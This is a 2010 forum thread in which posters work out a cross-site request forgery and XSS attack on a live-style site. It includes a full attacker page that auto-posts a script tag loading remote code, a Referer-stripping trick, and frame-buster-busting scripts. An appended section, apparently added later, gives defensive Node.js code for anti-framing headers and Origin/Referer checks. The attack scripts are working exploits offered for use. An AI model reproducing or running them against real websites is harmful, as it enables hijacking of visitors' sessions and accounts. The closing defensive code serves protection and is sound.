Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Javascript deleting other javascript?
Posted by: Neo139
Date: May 29, 2010 03:43PM

Hi. I don't know if this is the right subforum.
I have found a POST form on a website vulnerable to XSS. The idea was to have an HTML file on my host (e.g. attacker.com/hack.html), and when the victim enters there, that hack.html has an iframe that POSTs the script code to the vulnerable form. The problem I'm having is that I can't do it silently, because the victim.com page has this javascript code in the <head>:
-------------
if (top.frames.length > 0)
top.location = self.location;
if (top != self)
top.location=self.location;

document.domain = 'victim.com';
---------------
This redirects the page if the URL in the browser address bar isn't the URL of THAT page. So entering attacker.com/hack.html will redirect you to victim.com even if the POST form code is inside an iframe.

Is there any way from hack.html to delete this code from the iframe that loads victims.com BEFORE the code gets executed by the browser? (When the redirect code is executed, all other HTTP requests get aborted, so my script inside one of the values of the form doesn't get executed.)

The code from my hack.html would be something like this:
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex, nofollow"></head>
<body>
<iframe name="d" id="d" src="about:blank"></iframe>
<script>
var x=0;
function go(){
if(x)
return;
x++;
try
{
var strVar="";
strVar += "<!DOCTYPE html PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\">";
strVar += "<html>";
strVar += "<head>";
strVar += "<body>";
strVar += "<form action=\"http:\/\/www.victim.com\/form.php\" method=\"post\" id=\"lala\" target=\"d\">";
strVar += "<input type=\"hidden\" name=\"scrapsell[72]\" value=\"\&quot;&gt;&lt;script src=http:\/\/u.nu\/47aqa&gt;&lt;\/script&gt;&lt;\">";
strVar += "<input type=\"hidden\" name=\"hash\" value=\"\">";
strVar += "<input type=\"hidden\" name=\"doscrapsell\" value=\"something\">";
strVar += "<input class=\"login_input\" type=\"submit\" value=\"\" >";
strVar += "<\/form>";
strVar += "<\/body>";
strVar += "<\/html>";
window.frames['d'].document.body.innerHTML=strVar;
window.frames['d'].document.getElementById('lala').submit();
}
catch(e){

}
}
</script>

<iframe name="c" id="c" onload="setTimeout('go()', 99)" src="about:blank" style="visibility:hidden"></iframe>
</body></html>

The reason why I put the form inside about:blank manually with javascript is that this way it hides the HTTP Referer (and victims.com doesn't process the form if the HTTP Referer is different from its own domain, but does process it if the HTTP Referer is null).

I have thought of some javascript in hack.html like:
<script language="JavaScript" type="text/javascript">
function ssearch()
{
var found=0;
while (found<1)
{
setTimeout("found = FindText(window.frames['foo'].document.body.innerHTML,'if (top.frames.length > 0)\n top.location = self.location;\n if (top != self)\n top.location=self.location; \n \n document.domain = 'victim.com';')",200);
}
reeplace();
}


function reeplace()
{
window.frames['foo'].document.body.innerHTML.replace("if (top.frames.length > 0)\n top.location = self.location;\n if (top != self)\n top.location=self.location; \n \n document.domain = 'victim.com"," ");
}

</script>

and then call ssearch().
But the only thing this does is crash my browser -_- I don't know if it's even possible to replace javascript from another website just because it's inside an iframe in the current website.
Any ideas?

Re: Javascript deleting other javascript?
Date: June 01, 2010 06:22AM

I haven't tried this out, but I think it might help.

Since top.frames is under your control, deleting it would cause top.frames.length to throw an error which would prevent the frame from busting out. Otherwise google anti frame busting.

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Re: Javascript deleting other javascript?
Posted by: p0deje
Date: June 06, 2010 12:04AM

That's a simple framebuster, which can be busted.
Look at http://stackoverflow.com/questions/958997/frame-buster-buster-buster-code-needed

---------
http://p0deje.blogspot.com

Re: Javascript deleting other javascript?
Posted by: Neo139
Date: June 27, 2010 03:25PM

I have tried that framebuster buster (server responds with 204).
It does work, but the page stops loading; the XSS I was trying to inject does not load the JS.

Re: Javascript deleting other javascript?
Posted by: marluxia
Date: August 18, 2010 09:47PM

Hi Neo139. This reminds me of a very similar vulnerability I used that also involved exploiting a CSRF hole. What I did was use the anti-frame-busting code mentioned by p0deje. Once I had sent the POST request I created an iframe to google images, which had an iframe to the target site. I figured out that the site removed the frame busting code in the case of images.google.com.

<script>
var vulnPage = 'http://someshitsitelol.com/vuln.cgi';
var counter = 0;
window.onbeforeunload = function() { counter++; };
setInterval(function() {
if(counter == 1) {
window.top.location = 'http://website-to/204.php';
createFrame();
}
}, 80);
function createFrame() {
var iframe = document.createElement('iframe');
iframe.src = 'http://images.google.com.au/imgres?imgurl=x&imgrefurl=' + vulnPage;

document.body.appendChild(iframe);
}
</script>

The code above no longer works as it seems like google images requires some more parameters for you to be able to link to another page.

I also found this: https://docs.google.com/fileview?id=0B9MkvtnWPqvEZmEyODdjZTYtYTI0ZS00MDU1LTg2OGEtNzhkNTk2YmJiNzlh&hl=en pdf which may be of use to you.

Sorry if I bumped an old thread lol : - (.



Edited 1 time(s). Last edit at 08/18/2010 09:49PM by marluxia.
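The thread turns on two weaknesses of the target site: a JavaScript frame buster that the 204 trick and the onbeforeunload counter in marluxia's post can neutralise, and a form handler that accepts a submission whenever the Referer is empty, which an about:blank frame produces on demand. The following is an added example (not code from the thread or from any of its posters) showing the server-side counterpart a defender would put in place: framing control expressed in response headers, which the browser enforces before any script in the framed page runs, and an Origin/Referer check that treats an absent or opaque origin as untrusted. It runs under Node.js; the origins, request samples and function names are constructed for illustration.

```javascript
// Added example, not from the thread. Node.js; all sample data constructed inline.

// 1. Framing control belongs in response headers, not in page script.
//    A JS frame buster can be neutralised (204 trick, onbeforeunload counters),
//    but X-Frame-Options / CSP frame-ancestors are applied by the browser
//    before the framed document's own scripts ever run.
//    allowedAncestors: list of CSP source expressions allowed to frame the
//    page, e.g. [] (nobody), ["'self'"], or ["'self'", 'https://partner.example'].
function antiFramingHeaders(allowedAncestors) {
  const ancestors = allowedAncestors.length ? allowedAncestors.join(' ') : "'none'";
  const headers = {
    'Content-Security-Policy': 'frame-ancestors ' + ancestors,
  };
  // X-Frame-Options only knows DENY and SAMEORIGIN; emit it as a fallback for
  // older browsers in exactly the two cases it can express.
  if (allowedAncestors.length === 0) {
    headers['X-Frame-Options'] = 'DENY';
  } else if (allowedAncestors.length === 1 && allowedAncestors[0] === "'self'") {
    headers['X-Frame-Options'] = 'SAMEORIGIN';
  }
  return headers;
}

// 2. The site in the thread processed a POST whenever Referer was empty.
//    The safe default is the reverse: no Origin and no Referer means reject.
//    (This check complements, not replaces, a per-session CSRF token.)
function originOf(value) {
  if (!value) return null;
  try {
    return new URL(value).origin; // throws on 'null', relative or garbage values
  } catch (e) {
    return null;
  }
}

function isTrustedFormSubmission(reqHeaders, siteOrigin) {
  // Normalise header names; Node lowercases them, but be explicit for samples.
  const h = {};
  for (const k of Object.keys(reqHeaders)) h[k.toLowerCase()] = reqHeaders[k];

  // Prefer Origin: browsers send it on cross-origin POSTs. The literal string
  // 'null' is an opaque origin (about:blank, sandboxed iframe, data: URL) and
  // never matches the site, so it is rejected here.
  if (h['origin'] !== undefined) return h['origin'] === siteOrigin;

  // Fall back to Referer only when it parses to exactly our origin.
  const ref = originOf(h['referer']);
  return ref !== null && ref === siteOrigin;
}

// Constructed sample requests mirroring the situations in the thread.
const SITE_ORIGIN = 'https://victim.example'; // hypothetical site
const SAMPLE_REQUESTS = [
  { name: 'same-origin form post',
    headers: { Origin: 'https://victim.example', Referer: 'https://victim.example/form.php' } },
  { name: 'cross-site post from attacker page',
    headers: { Origin: 'https://attacker.example', Referer: 'https://attacker.example/hack.html' } },
  { name: 'post from about:blank frame (no Origin, no Referer)',
    headers: {} },
  { name: 'opaque origin',
    headers: { Origin: 'null' } },
];

// Returns [{name, trusted}] so the decision per sample can be inspected.
function evaluateSamples() {
  return SAMPLE_REQUESTS.map(r => ({
    name: r.name,
    trusted: isTrustedFormSubmission(r.headers, SITE_ORIGIN),
  }));
}

for (const r of evaluateSamples()) {
  console.log((r.trusted ? 'ACCEPT ' : 'REJECT ') + r.name);
}
console.log(antiFramingHeaders([]));
```

Only the same-origin sample is accepted; the about:blank case that the thread relies on is rejected because the absence of both headers is no longer treated as "same site". Where a header cannot be set and a script fallback is unavoidable, the robust pattern is to hide the document by default in CSS and only reveal it when `self == top`, so that a blocked redirect leaves a blank page rather than an interactive one.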
